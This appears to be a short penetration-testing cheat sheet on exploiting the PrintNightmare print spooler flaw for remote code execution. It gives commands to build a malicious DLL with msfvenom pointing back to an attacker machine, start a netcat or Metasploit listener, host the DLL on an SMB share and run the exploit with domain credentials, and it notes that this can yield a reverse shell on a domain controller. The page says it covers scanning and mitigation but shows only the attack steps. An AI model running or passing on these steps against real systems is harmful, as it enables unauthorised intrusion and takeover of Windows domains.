Skip to main content

PrintNightmare (Internal/External)

Remote Code Execution

Contains full details on scanning and mitigation. Could potentially be used against a domain controller for easy access to a reverse shell.


Create payload

msfvenom -p <payload> LHOST=<kali-ip> LPORT=<port> -f dll -o file.dll


Start a listener

Could be netcat or metasploit multi-handler


Start an SMB server to host the malicious DLL

sudo share $PWD -smb2support


Run the exploit per the GitHub documentation domain/user:password@target-ip-address 'malicious.dll'